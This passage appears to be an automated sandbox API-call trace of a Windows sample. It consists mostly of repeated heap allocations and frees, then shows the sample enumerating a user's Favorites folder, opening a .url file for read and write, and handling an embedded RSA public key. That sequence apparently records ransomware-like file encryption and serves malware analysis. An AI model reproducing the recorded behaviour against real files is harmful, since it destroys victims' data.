lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0193.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0193.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0193.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0193.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0193.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0193.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0193.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0193.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0193.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0193.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0193.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0193.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0193.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0193.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0193.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0193.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0193.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0193.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0193.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.095] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\") returned="Microsoft Websites\\" [0193.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0193.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3cd8 [0193.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.096] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0193.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0193.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3cd8 | out: hHeap=0x2c0000) returned 1 [0193.096] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0193.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0193.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0193.097] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0193.097] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0193.097] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0193.097] PathFindFileNameW (pszPath="") returned="" [0193.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.097] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0193.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.099] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0193.099] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee50dc0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0193.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edcf8 [0193.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.099] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned=".url" [0193.099] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0193.100] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=133) returned 1 [0193.100] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0193.104] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.104] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0193.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0193.105] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.105] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x85, lpOverlapped=0x0) returned 1 [0193.105] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0193.105] lstrlenA (lpString="-----BEGIN PUBLIC 